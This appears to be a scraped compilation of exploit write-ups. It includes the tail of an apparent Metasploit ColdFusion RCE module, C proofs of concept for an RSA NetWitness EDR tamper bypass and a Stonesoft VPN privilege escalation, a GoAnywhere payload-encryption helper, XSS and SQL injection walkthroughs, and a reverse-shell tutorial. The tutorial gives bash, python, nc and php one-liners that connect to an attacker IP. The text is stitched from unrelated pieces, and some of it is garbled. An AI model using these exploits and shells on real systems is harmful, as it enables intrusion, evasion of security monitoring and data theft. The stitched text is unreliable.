'action' => 'services.schedule',
'action2' => 'create'
},
'vars_post' => {
'name' => payload_base,
'url' => get_uri.to_s,
'interval' => '3600',
'start_day' => '01',
'start_month' => '02',
'start_year' => '2023',
'start_hour' => '00',
'start_minute' => '00',
'start_second' => '00',
'run' => 'create'
}
})
fail_with(Failure::Unreachable, 'Could not connect to the web service') if create_job.nil?
fail_with(Failure::UnexpectedReply, 'Unable to create job') unless create_job.code == 302
print_good('Job ' + payload_base + ' created successfully')
job_file_path = file_path = webroot
fail_with(Failure::UnexpectedReply, 'Could not identify the web root') if job_file_path.blank?
case target['Type']
when :unix_cmd
file_path << '/'
job_file_path = "#{job_file_path.gsub('/', '//')}//"
when :windows_cmd
file_path << '\\'
job_file_path = "#{job_file_path.gsub('\\', '\\\\')}\\"
end
update_job = send_request_cgi({
'method' => 'POST',
'uri' => target_uri.path,
'keep_cookies' => true,
'vars_get' => {
'action' => 'services.schedule',
'action2' => 'edit',
'task' => create_job.headers['location'].split('=')[-1]
},
'vars_post' => {
'name' => payload_base,
'url' => get_uri.to_s,
'port' => datastore['SRVPORT'],
'timeout' => '50',
'username' => '',
'password' => '',
'proxyserver' => '',
'proxyport' => '',
'proxyuser' => '',
'proxypassword' => '',
'publish' => 'true',
'file' => "#{job_file_path}#{payload_base}.cfm",
'start_day' => '01',
'start_month' => '02',
'start_year' => '2023',
'start_hour' => '00',
'start_minute' => '00',
'start_second' => '00',
'end_day' => '',
'end_month' => '',
'end_year' => '',
'end_hour' => '',
'end_minute' => '',
'end_second' => '',
'interval_hour' => '1',
'interval_minute' => '0',
'interval_second' => '0',
'run' => 'update'
}
})
fail_with(Failure::Unreachable, 'Could not connect to the web service') if update_job.nil?
fail_with(Failure::UnexpectedReply, 'Unable to update job') unless update_job.code == 302 || update_job.code == 200
register_files_for_cleanup("#{file_path}#{payload_base}.cfm")
print_good('Job ' + payload_base + ' updated successfully')
end
def execute_job(payload_base)
print_status("Executing scheduled job: #{payload_base}")
job_execution = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'vars_get' => {
'action' => 'services.schedule'
},
'vars_post' => {
'row_1' => '1',
'name_1' => payload_base,
'mainAction' => 'execute'
}
})
fail_with(Failure::Unreachable, 'Could not connect to the web service') if job_execution.nil?
fail_with(Failure::Unknown, 'Unable to execute job') unless job_execution.code == 302 || job_execution.code == 200
print_good('Job ' + payload_base + ' executed successfully')
payload_response = nil
retry_until_truthy(timeout: datastore['PAYLOAD_DEPLOY_TIMEOUT']) do
print_status('Attempting to access payload...')
payload_response = send_request_cgi(
'uri' => '/' + payload_base + '.cfm',
'method' => 'GET'
)
payload_response.nil? || (payload_response && payload_response.code == 200 && payload_response.body.exclude?('Error')) || (payload_response.code == 500)
end
# Unix systems tend to return a 500 response code when executing a shell. Windows tends to return a nil response, hence the check for both.
fail_with(Failure::Unknown, 'Unable to execute payload') unless payload_response.nil? || payload_response.code == 200 || payload_response.code == 500
if payload_response.nil?
print_status('No response from ' + payload_base + '.cfm' + (session_created? ? '' : ' Check your listener!'))
elsif payload_response.code == 200
print_good('Received 200 response from ' + payload_base + '.cfm')
output = payload_response.body.strip
if output.include?("\n")
print_good('Output:')
print_line(output)
elsif output.present?
print_good('Output: ' + output)
end
elsif payload_response.code == 500
print_status('Received 500 response from ' + payload_base + '.cfm' + (session_created? ? '' : ' Check your listener!'))
end
end
def webroot
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})
return nil unless res
res.get_html_document.at('[text()*="Webroot"]')&.next&.next&.text
end
def cfm_stub
case target['Type']
when :windows_cmd
<<~CFM.gsub(/^\s+/, '').tr("\n", '')
<cfscript>
cfexecute(name="cmd.exe", arguments="/c " & toString(binaryDecode("#{Base64.strict_encode64(payload.encoded)}", "base64")),timeout=5);
</cfscript>
CFM
when :unix_cmd
<<~CFM.gsub(/^\s+/, '').tr("\n", '')
<cfscript>
cfexecute(name="/bin/bash", arguments=["-c", toString(binaryDecode("#{Base64.strict_encode64(payload.encoded)}", "base64"))],timeout=5);
</cfscript>
CFM
end
end
end
# Exploit Title: RSA NetWitness Platform 12.2 - Incorrect Access Control / Code Execution
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
RSA Security
www.netwitness.com
[Product]
NetWitness Endpoint EDR Agent
The RSA NetWitness detection and response (EDR) endpoint monitors activity across all your endpoints—on and off the network—providing deep visibility
into their security state, and it prioritizes alerts when there is an issue. NetWitness Endpoint drastically reduces dwell time by rapidly
detecting new and non-malware attacks that other EDR solutions miss, and it cuts the cost, time and scope of incident response.
[Vulnerability Type]
Incorrect Access Control / Code Execution
[CVE Reference]
CVE-2022-47529
[Security Issue]
CVE-2022-47529 allows local users to stop the Endpoint Windows agent from sending the events to SIEM or make the agent run user-supplied commands.
Insecure Win32 memory objects in Endpoint Windows Agents in the NetWitness Platform through 12.x allow local
and admin Windows user accounts to modify the endpoint agent service configuration:
to either disable it completely or run user-supplied code or commands, thereby bypassing tamper-protection features via ACL modification.
Interestingly, the agent was uploaded to virustotal on 2022-01-05 17:24:32 UTC months before finding and report.
SHA-256 770005f9b2333bf713ec533ef1efd2b65083a5cfb9f8cbb805ccb2eba423cc3d
LANDeskService.exe
[Severity]
Critical
[Impact(s)]
Denial-of-Service
Arbitrary Code Execution
[Attack Vector]
To exploit, open handle to memory objects held by the endpoint agent,
modify the ACL for the ones that have insecure ACLs, and DENY access to Everyone group
[Affected Product Code Base]
All versions prior to v12.2
[Network Access]
Local
[References]
https://community.netwitness.com/t5/netwitness-platform-security/nw-2023-04-netwitness-platform-security-advisory-cve-2022-47529/ta-p/696935
[Vuln Code Block]:
00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p
.text:00000001400F7B10 ; sub_14013BA50+19?p
.text:00000001400F7B10 ; DATA XREF: ...
.text:00000001400F7B10 push rbx
.text:00000001400F7B12 sub rsp, 20h
.text:00000001400F7B16 mov rbx, rcx
.text:00000001400F7B19 test rcx, rcx
.text:00000001400F7B1C jz short loc_1400F7B5C
.text:00000001400F7B1E call cs:InitializeCriticalSection
.text:00000001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection
.text:00000001400F7B28 call cs:InitializeCriticalSection
.text:00000001400F7B2E mov edx, 1 ; bManualReset
.text:00000001400F7B33 xor r9d, r9d ; lpName
.text:00000001400F7B36 mov r8d, edx ; bInitialState
.text:00000001400F7B39 xor ecx, ecx ; lpEventAttributes
.text:00000001400F7B3B call cs:CreateEventW
.text:00000001400F7B41 mov [rbx+50h], rax
.text:00000001400F7B45 mov dword ptr [rbx+58h], 0
.text:00000001400F7B4C test rax, rax
.text:00000001400F7B4F jz short loc_1400F7B5C
[Exploit/POC]
"RSA_NetWitness_Exploit.c"
#include "windows.h"
#include "stdio.h"
#include "accctrl.h"
#include "aclapi.h"
#define OPEN_ALL_ACCESS 0x1F0003
/*
RSA NetWitness EDR Endpoint Agent
Tamper Protection Bypass / EoP Code Execution
RSA NetWitness.msi --> NWEAgent.exe
MD5: c0aa7e52cbf7799161bac9ebefa38d49
Expected result: Low privileged standard users are prevented from interfering with and or modifying events for the RSA Endpoint Agent.
Actual result: RSA NetWitness Endpoint Agent is terminated by a low privileged standard non-administrator user.
By John Page (hyp3rlinx) - Nov 2022
DISCLAIMER: The author of this code is not responsible or liable for any damages whatsoever from testing, modifying and or misuse.
Users of this supplied PoC code accept all risks, do no harm.
X64 PE file vuln code block:
00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p
.text:00000001400F7B10 ; sub_14013BA50+19?p
.text:00000001400F7B10 ; DATA XREF: ...
.text:00000001400F7B10 push rbx
.text:00000001400F7B12 sub rsp, 20h
.text:00000001400F7B16 mov rbx, rcx
.text:00000001400F7B19 test rcx, rcx
.text:00000001400F7B1C jz short loc_1400F7B5C
.text:00000001400F7B1E call cs:InitializeCriticalSection
.text:00000001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection
.text:00000001400F7B28 call cs:InitializeCriticalSection
.text:00000001400F7B2E mov edx, 1 ; bManualReset
.text:00000001400F7B33 xor r9d, r9d ; lpName
.text:00000001400F7B36 mov r8d, edx ; bInitialState
.text:00000001400F7B39 xor ecx, ecx ; lpEventAttributes
.text:00000001400F7B3B call cs:CreateEventW
.text:00000001400F7B41 mov [rbx+50h], rax
.text:00000001400F7B45 mov dword ptr [rbx+58h], 0
.text:00000001400F7B4C test rax, rax
.text:00000001400F7B4F jz short loc_1400F7B5C
1) Install "RSA NetWitness.msi" (Endpoint EDR Agent)
2) Run Exploit PoC as a Standard non-admin user, the PoC will:
a) Open a handle (copy) to Ecat002 event.
b) Open additional handles for events Ecat004 and Ecat002, modifying them to deny access to Everyone group.
c) Set/Reset event the Ecat002 handle.
d) if admin privs change the EDR service configuration
Non vulnerable agents will output "Not vulnerable to the console", customers can modify and use test to see if vuln.
*/
char Vuln_Events[][32] = {"Global\\Ecat004", "Global\\Ecat002"};
BOOL PWNED=FALSE;
void Exploit();
int AdminChl();
void HijackSvcConfig();
int main(void){
printf("[+] RSA NetWitness EDR Agent 0Day\n");
printf("[+] CVE-2022-47529\n");
printf("[+] Discovery: John Page (aka hyp3rlinx)\n");
printf("[+] ===================================\n");
Exploit();
if( AdminChk() ){
printf("[+] Hijacked NetWitness Agent Service!\n");
HijackSvcConfig();
}
Sleep(2000);
printf("[+] Done!\n\n");
system("pause");
return 0;
}
void Exploit(){
PACL pOldDACL = NULL;
PACL pNewDACL = NULL;
HANDLE hEvent_Ecat002 = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)"Global\\Ecat002");
int i=0;
for(; i < sizeof(Vuln_Events) / sizeof(Vuln_Events[0]); i++){
HANDLE hEvent = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)Vuln_Events[i]);
if(hEvent != INVALID_HANDLE_VALUE){
printf("[-] Targeting Event: %s\n", Vuln_Events[i]);
Sleep(500);
if(GetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) == ERROR_SUCCESS){
TRUSTEE trustee[1];
trustee[0].TrusteeForm = TRUSTEE_IS_NAME;
trustee[0].TrusteeType = TRUSTEE_IS_GROUP;
trustee[0].ptstrName = TEXT("Everyone");
trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;
trustee[0].pMultipleTrustee = NULL;
EXPLICIT_ACCESS explicit_access_list[1];
ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));
explicit_access_list[0].grfAccessMode = DENY_ACCESS;
explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;
explicit_access_list[0].grfInheritance = NO_INHERITANCE;
explicit_access_list[0].Trustee = trustee[0];
if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){
printf("%s%d", "[!] Not vulnerable! ", GetLastError());
}
if(SetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){
printf("%s%d", "[!] Not vulnerable! ", GetLastError());
}else{
SetEvent(hEvent_Ecat002);
Sleep(1000);
ResetEvent(hEvent_Ecat002);
CloseHandle(hEvent_Ecat002);
SetEvent(hEvent);
Sleep(1000);
PWNED=TRUE;
}
if(PWNED){
LocalFree(pNewDACL);
LocalFree(pOldDACL);
CloseHandle(hEvent);
}
Sleep(1000);
}
}
}
}
//If run as admin, modify the agent service config to run our own code.
int AdminChk(){
int result = 0;
HANDLE hToken = NULL;
if(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY,&hToken)){
TOKEN_ELEVATION elevated;
DWORD tokSize = sizeof(TOKEN_ELEVATION);
if(GetTokenInformation(hToken, TokenElevation, &elevated, sizeof(elevated), &tokSize)){
result = elevated.TokenIsElevated;
}
}
if(hToken){
CloseHandle(hToken);
}
return result;
}
//Trivial example modify the service config...
void HijackSvcConfig(){
Sleep(1000);
WinExec("sc failure NWEAgent command= ""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" "Evil-Command-Here""", 0);
}
[POC Video URL]
https://www.youtube.com/watch?v=kO1fu4IOlSs
[Disclosure Timeline]
Vendor Notification: December 2, 2022
CVE assigned: December 19, 2022
Hotfix v12.1.0.1: January 3, 2023
Fixed in v12.2.0.0 January 4, 2023
Restested for vendor: January 6, 2023
March 24, 2023 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
Exploit Title: ENTAB ERP 1.0 - Username PII leak
Date: 17.05.2022
Exploit Author: Deb Prasad Banerjee
Vendor Homepage: https://www.entab.in
Version: Entab ERP 1.0
Tested on: Windows IIS
CVE: CVE-2022-30076
Vulnerability Name: Broken Access control via Rate Limits
Description:
In the entab software in fapscampuscare.in, there is a login portal with a
UserId field. An authenticated user would enter and get their name as well
as other services. However, there should be a rate limit in place, which is
not present. As a result, a hacker could bypass the system and obtain other
usernames via broken access control. This enables a threat actor to
obain the complete full name and user ID of the person.
POC:
1. Go to fapscampuscare.in or any entab hosted software and find the entab
software.
2. Use a proxy to intercept the request.
3. Since it's a student login, try a random UserId (e.g., s11111).
4. Intercept the request using Burp Suite and send it to the Intruder.
5. Select payloads from number 100000-20000, and turn off URL encoding on
the UserId parameter.
6. Start the attack and sort by length to obtain the username and full name
of other users.
The biggest feature of Java file jar is cross-platform, but the more troublesome thing is that we need to install the Java environment. It's very simple for professionals, but it's relatively bloated for other users. Today, let’s talk about how to save jar files as exe files.
Software used
eclipseexe4j
Generate jar file
Run eclipse to open our project.
Select the project-export-jar file
As shown in the figure, remove the √ in front of lib and setting (config) and the √ in front of classpath project and set the saved name.
Click next step to set the main class and click to finish!
Generate jar to exe
Run exe4j to select jar in exe mode
Create a new folder, preferably the same name as the project. Copy the lib and settings under the project and the jar file we generated to this directory.
Set the generated name and the location of the file just created
Click Next, set the name, icon, click Advanced Settings, set compatible with 32 and 64-bit systems
Add our runnable jar file, the library file that has been used in the project lib
Setting version
Then go all the way down!
# Exploit Title: Online Appointment System V1.0 - Cross-Site Scripting (XSS)
# Date: 25/02/2023
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14502/online-appointment-system-php-full-source-code-2020.html
# Tested on: Windows
use payload="><script>alert(XSS)</script>
1. visit-http://localhost/doctor/applicationlayer/Doctorpatient.php
2. login Doctor account with default credential
3. Click left side add description
4. capture request and put payload
http://localhost/doctor/presentaionlayer/doctor/add.php/wrycv%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
request
GET /doctor/presentaionlayer/doctor/add.php/wrycv%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E HTTP/1.1
Host: localhost
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ocj11iinu8pn536i3cdia0faql
Connection: close
# Exploit Title: Medicine Tracker System v1.0 - Sql Injection
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-mts_0.zip
# Version: V1.0.0
# Tested on: Windows/Linux
# Proof of Concept:
# 1- http://localhost/php-mts/app/login.php
# 2- login with default credential
# 3- Click left side Manage account and fill Update User Details and click update account
# 4- Capture request using burp suite
# 5- Save request request.txt
Sqlmap
POST /php-mts/classes/Users.php?f=save_user HTTP/1.1
Host: localhost
Content-Length: 661
sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeOo3CzyRX6fHexZx
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-mts/app/?page=manage_account
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ocj11iinu8pn536i3cdia0faql
Connection: close
------WebKitFormBoundaryeOo3CzyRX6fHexZx
Content-Disposition: form-data; name="id"
1'-'
------WebKitFormBoundaryeOo3CzyRX6fHexZx
Content-Disposition: form-data; name="firstname"
gogo
------WebKitFormBoundaryeOo3CzyRX6fHexZx
Content-Disposition: form-data; name="middlename"
ogo
------WebKitFormBoundaryeOo3CzyRX6fHexZx
Content-Disposition: form-data; name="lastname"
singh
------WebKitFormBoundaryeOo3CzyRX6fHexZx
Content-Disposition: form-data; name="username"
mayuri.infospace@gmail.com
------WebKitFormBoundaryeOo3CzyRX6fHexZx
Content-Disposition: form-data; name="password"
12345678
------WebKitFormBoundaryeOo3CzyRX6fHexZx--
sqlmap
sqlmap -r request.txt -p "id" --dbs --batch
___
__H__
___ ___["]_____ ___ ___ {1.6.12#stable}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:18:01 /2023-03-21/
[13:18:01] [INFO] parsing HTTP request from 'request.txt'
it appears that provided value for POST parameter 'id' has boundaries. Do you want to inject inside? ('' or true*--') [y/N] N
[13:18:01] [INFO] resuming back-end DBMS 'mysql'
[13:18:01] [INFO] testing connection to the target URL
[13:18:01] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=' or true AND (SELECT 3138 FROM(SELECT COUNT(*),CONCAT(0x7178787171,(SELECT (ELT(3138=3138,1))),0x717a6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mDhI--&name=para&description=ss
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=' or true AND (SELECT 8994 FROM (SELECT(SLEEP(5)))doso)-- HjCh--&name=para&description=ss
---
[13:18:01] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.54, PHP 8.0.25
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:18:01] [INFO] fetching database names
[13:18:01] [INFO] resumed: 'information_schema'
[13:18:01] [INFO] resumed: 'art_gallery'
[13:18:01] [INFO] resumed: 'hcpms'
[13:18:01] [INFO] resumed: 'mts_db'
[13:18:01] [INFO] resumed: 'mysql'
[13:18:01] [INFO] resumed: 'performance_schema'
[13:18:01] [INFO] resumed: 'phpmyadmin'
[13:18:01] [INFO] resumed: 'sscdms_db'
[13:18:01] [INFO] resumed: 'test'
available databases [9]:
[*] art_gallery
[*] hcpms
[*] information_schema
[*] mts_db
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] sscdms_db
[*] test
[13:18:01] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.1.2'
[*] ending @ 13:18:01 /2023-03-21/
In our penetration testing process, the most commonly used one is to rebound a shell based on the tcp/udp protocol, that is, reverse connection.
Let’s first talk about what forward and reverse connections are.
Forward connection: Our machine connects to the target machine, such as ssh and mstsc
Reverse connection: The target machine connects our machine
So why is reverse connection more commonly used
The target machine is in the LAN, and we are not able to connect to him
The target machine is a dynamic IP
The target machine has a firewall
Then let me talk about my experimental environment
Attack aircraft: Kali Linux: 47.98.229.211
Victimized machine: Centos 7: 149.129.68.117 (Ali Cloud Server)
Position 1
is also the most common way
Kali Monitor
nc -lvvp 4444centos run
-i /dev/tcp/47.98.229.211/5555 01 After executing the command, it successfully rebounded!
Position Two python
Attack aircraft Kali or monitor
nc -lvvp 5555centos execution
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('47.98.229.211',27409));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/','-i']);'
Pose three nc
If there is nc on the target machine and the -e parameter exists, then a reverse shell can be created
Attack aircraft monitoring
nc -lvvp 5555 target machine execution
nc 47.98.229.211 5555 -t -e /bin/This will bounce the target machine's /bin/to the attack machine
However, many Linux NCs are castrated versions. If the target machine does not have NC or does not have the -e option, it is not recommended to use NC methods.
Pose Four php
Attack aircraft monitoring
nc -lvvp 4444 requires the target machine to have php and then execute
php -r '$sock=fsocopen('172.16.1.130',4444);exec('/bin/sh -i 3 3 23');'
Some other high-energy operations
About PHP payload
Now perform simple configuration in msfconsole
msf use exploit/multi/handler
msf exploit(handler) set payload windows/meterpreter/reverse_tcp
payload=windows/meterpreter/reverse_tcp
msf exploit(handler) set LHOST 192.168.1.107
LHOST=192.168.1.107PHP?
php error_reporting(0); $ip='x.x.x.x'; $port=53; if (($f='stream_socket_client') is_callable($f)) {
{$port}'); $s_type='stream'; } if (!$s ($f='fsocckopen') is_callable($f)) { $s=$f($ip, $port); $s_
strlen($b)); break; case 'socket': $b .=socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock']=$s;
$GLOBALS['msgsock_type']=$s_type; if (extension_loaded('s
// Exploit Title: Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)
// Google Dork: title:"GoAnywhere"
// Date: 3/26/2023
// Exploit Author: Youssef Muhammad
// Vendor Homepage: https://www.goanywhere.com/
// Software Link: https://www.dropbox.com/s/j31l8lgvapbopy3/ga7_0_3_linux_x64.sh?dl=0
// Version: > 7.1.1 for windows / > 7.0.3 for Linux
// Tested on: Windows, Linux
// CVE : CVE-2023-0669
// This script is needed to encrypt the serialized payload generated by the ysoserial tool in order to achieve Remote Code Execution
import java.util.Base64;
import javax.crypto.Cipher;
import java.nio.charset.StandardCharsets;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.nio.file.Files;
import java.nio.file.Paths;
public class CVE_2023_0669_helper {
static String ALGORITHM = "AES/CBC/PKCS5Padding";
static byte[] KEY = new byte[30];
static byte[] IV = "AES/CBC/PKCS5Pad".getBytes(StandardCharsets.UTF_8);
public static void main(String[] args) throws Exception {
if (args.length != 2) {
System.out.println("Usage: java CVE_2023_0669_helper <file_path> <version>");
System.exit(1);
}
String filePath = args[0];
String version = args[1];
byte[] fileContent = Files.readAllBytes(Paths.get(filePath));
String encryptedContent = encrypt(fileContent, version);
System.out.println(encryptedContent);
}
public static String encrypt(byte[] data, String version) throws Exception {
Cipher cipher = Cipher.getInstance(ALGORITHM);
KEY = (version.equals("2")) ? getInitializationValueV2() : getInitializationValue();
SecretKeySpec keySpec = new SecretKeySpec(KEY, "AES");
IvParameterSpec ivSpec = new IvParameterSpec(IV);
cipher.init(Cipher.ENCRYPT_MODE, keySpec, ivSpec);
byte[] encryptedObject = cipher.doFinal(data);
String bundle = Base64.getUrlEncoder().encodeToString(encryptedObject);
String v = (version.equals("2")) ? "$2" : "";
bundle += v;
return bundle;
}
private static byte[] getInitializationValue() throws Exception {
// Version 1 Encryption
String param1 = "go@nywhereLicenseP@$$wrd";
byte[] param2 = {-19, 45, -32, -73, 65, 123, -7, 85};
return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 9535, 256)).getEncoded();
}
private static byte[] getInitializationValueV2() throws Exception {
// Version 2 Encryption
String param1 = "pFRgrOMhauusY2ZDShTsqq2oZXKtoW7R";
byte[] param2 = {99, 76, 71, 87, 49, 74, 119, 83, 109, 112, 50, 75, 104, 107, 56, 73};
return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 3392, 256)).getEncoded();
}
}
# Exploit Title: Stonesoft VPN Client 6.2.0 / 6.8.0 - Local Privilege Escalation
# Exploit Author : TOUHAMI KASBAOUI
# Vendor Homepage : https://www.forcepoint.com/
# Software: Stonesoft VPN Windows
# Version : 6.2.0 / 6.8.0
# Tested on : Windows 10
# CVE : N/A
#Description local privilege escalation vertical from Administrator to NT AUTHORITY / SYSTEM
#define UNICODE
#define _UNICODE
#include <Windows.h>
#include <iostream>
using namespace std;
enum Result
{
unknown,
serviceManager_AccessDenied,
serviceManager_DatabaseDoesNotExist,
service_AccessDenied,
service_InvalidServiceManagerHandle,
service_InvalidServiceName,
service_DoesNotExist,
service_Exist
};
Result ServiceExists(const std::wstring& serviceName)
{
Result r = unknown;
SC_HANDLE manager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, GENERIC_READ);
if (manager == NULL)
{
DWORD lastError = GetLastError();
if (lastError == ERROR_ACCESS_DENIED)
return serviceManager_AccessDenied;
else if (lastError == ERROR_DATABASE_DOES_NOT_EXIST)
return serviceManager_DatabaseDoesNotExist;
else
return unknown;
}
SC_HANDLE service = OpenService(manager, serviceName.c_str(), GENERIC_READ);
if (service == NULL)
{
DWORD error = GetLastError();
if (error == ERROR_ACCESS_DENIED)
r = service_AccessDenied;
else if (error == ERROR_INVALID_HANDLE)
r = service_InvalidServiceManagerHandle;
else if (error == ERROR_INVALID_NAME)
r = service_InvalidServiceName;
else if (error == ERROR_SERVICE_DOES_NOT_EXIST)
r = service_DoesNotExist;
else
r = unknown;
}
else
r = service_Exist;
if (service != NULL)
CloseServiceHandle(service);
if (manager != NULL)
CloseServiceHandle(manager);
return r;
}
bool ChangeName() {
LPCWSTR parrentvpnfilename = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe";
LPCWSTR newName = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn_old.exe";
bool success = MoveFile(parrentvpnfilename, newName);
if (success) {
cerr << "[+] SVGVPN filename changed.\n";
}
else {
cerr << "Failed to rename file \n";
}
return 0;
}
int main() {
const uint8_t shellcode[7168] = {
0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00,
0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
}; //You can set array bin of your reverse shell PE file here
std::wstring serviceName = L"sgipsecvpn";
Result result = ServiceExists(serviceName);
if (result == service_Exist)
std::wcout << L"The VPN service '" << serviceName << "' exists." << std::endl;
else if (result == service_DoesNotExist)
std::wcout << L"The service '" << serviceName << "' does not exist." << std::endl;
else
std::wcout << L"An error has occurred, and it could not be determined whether the service '" << serviceName << "' exists or not." << std::endl;
ChangeName();
HANDLE fileHandle = CreateFile(L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
cerr << "[*] Loading Malicious file into main PE of Forcepoint Installer \n";
if (fileHandle == INVALID_HANDLE_VALUE) {
cerr << "Failed to create shellcode\n";
return 1;
}
DWORD bytesWritten;
if (!WriteFile(fileHandle, shellcode, sizeof(shellcode), &bytesWritten, NULL)) {
cerr << "Failed to write to file\n";
CloseHandle(fileHandle);
return 1;
}
CloseHandle(fileHandle);
cout << "[+] Payload exported to ForcePointVPN \n";
Sleep(30);
cout << "[+] Restart ForcePointVPN Service \n";
SC_HANDLE scmHandle = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
SC_HANDLE serviceHandle = OpenService(scmHandle, TEXT("sgipsecvpn"), SERVICE_ALL_ACCESS);
SERVICE_STATUS serviceStatus;
QueryServiceStatus(serviceHandle, &serviceStatus);
if (serviceStatus.dwCurrentState == SERVICE_RUNNING) {
ControlService(serviceHandle, SERVICE_CONTROL_STOP, &serviceStatus);
while (serviceStatus.dwCurrentState != SERVICE_STOPPED) {
QueryServiceStatus(serviceHandle, &serviceStatus);
Sleep(1000);
}
}
StartService(serviceHandle, NULL, NULL);
